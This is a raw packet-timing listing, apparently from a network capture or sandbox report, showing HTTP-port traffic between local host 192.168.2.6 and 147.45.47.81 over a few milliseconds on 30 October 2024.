                                                              Oct 30, 2024 15:44:45.967396021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967398882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967458010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967468977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967489004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967495918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967499018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967509985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967526913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967529058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967564106 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969515085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969564915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969579935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969590902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969603062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969614983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969623089 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969626904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969667912 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969681978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969692945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969703913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969715118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969717979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969727039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969739914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969748974 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969764948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969767094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969780922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969795942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969803095 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969806910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969819069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969829082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969835997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969849110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969861984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969877005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969882965 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969882965 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969888926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969899893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969913006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969923019 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.969924927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.969949961 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970292091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970303059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970314026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970323086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970325947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970330954 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970336914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970362902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970366001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970376015 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970376968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970388889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970401049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970411062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970413923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.970473051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.970819950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.971230984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971241951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971252918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971277952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.971307993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.971319914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971332073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971343040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971349001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971362114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971371889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971384048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.971390963 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.971430063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.971502066 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972143888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972263098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972301960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972302914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972313881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972347021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972424984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972435951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972443104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972449064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972455978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972465992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972477913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.972493887 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972518921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.972826004 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.973210096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973221064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973234892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973247051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973263025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973263025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.973274946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973287106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973289013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.973298073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973310947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973318100 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.973323107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.973361015 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.973540068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974112988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974132061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974183083 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974261045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974284887 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974294901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974328995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974339962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974370956 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974452972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974464893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974476099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974487066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974502087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974510908 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974514008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974526882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.974526882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.974546909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.975105047 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.975431919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975444078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975455046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975490093 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.975522041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.975528002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975539923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975558043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975570917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975577116 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.975581884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975589037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975595951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.975671053 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976114988 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976339102 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976351976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976362944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976382017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976391077 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976394892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976398945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976406097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976418018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976433992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976435900 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976448059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976454973 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976460934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.976492882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.976608992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.977152109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.977395058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977415085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977427006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977437973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977442026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.977449894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977456093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977457047 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.977463961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977469921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977477074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977483988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.977539062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.977649927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978220940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978231907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978243113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978261948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978264093 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978274107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978290081 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978291988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978312969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978312969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978326082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978338957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978348017 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978351116 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.978375912 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.978657007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979217052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979266882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979269981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979401112 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979437113 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979506016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979517937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979535103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979547024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979553938 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979558945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979571104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979578972 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979583025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979594946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979603052 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979608059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.979631901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.979953051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.980376005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980417013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.980485916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980503082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980515957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980526924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980540037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980551958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980557919 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.980564117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980575085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980588913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.980601072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.980624914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.980722904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981354952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981374025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981394053 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981497049 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981503963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981514931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981527090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981537104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981548071 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981549978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981560946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981570005 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981574059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981585979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.981601954 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.981621981 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982187033 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982332945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982371092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982372999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982383966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982412100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982419968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982424021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982439995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982456923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982491970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982502937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982512951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982523918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.982542992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.982553959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.983287096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983318090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983330965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983345985 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.983359098 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.983380079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983390093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983401060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983407021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983431101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983443022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983474970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.983498096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.983747959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984333992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984380960 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984414101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984426022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984457970 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984484911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984497070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984507084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984539032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984555006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984569073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984575987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984575987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984580040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984594107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984605074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.984606028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.984630108 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985410929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985421896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985431910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985464096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985471964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985481024 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985493898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985506058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985517025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985528946 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985529900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985542059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985554934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.985555887 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985577106 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.985778093 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986345053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986355066 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986382961 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986423016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986433983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986444950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986457109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986466885 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986470938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986489058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986495018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986500978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986510992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986521959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.986530066 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.986546040 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.987400055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987411976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987422943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987435102 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987447023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987448931 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.987458944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987469912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987476110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.987481117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987493038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987493992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.987505913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.987513065 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.987526894 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.988296986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988308907 CET8049995147.45.47.81192.168.2.6
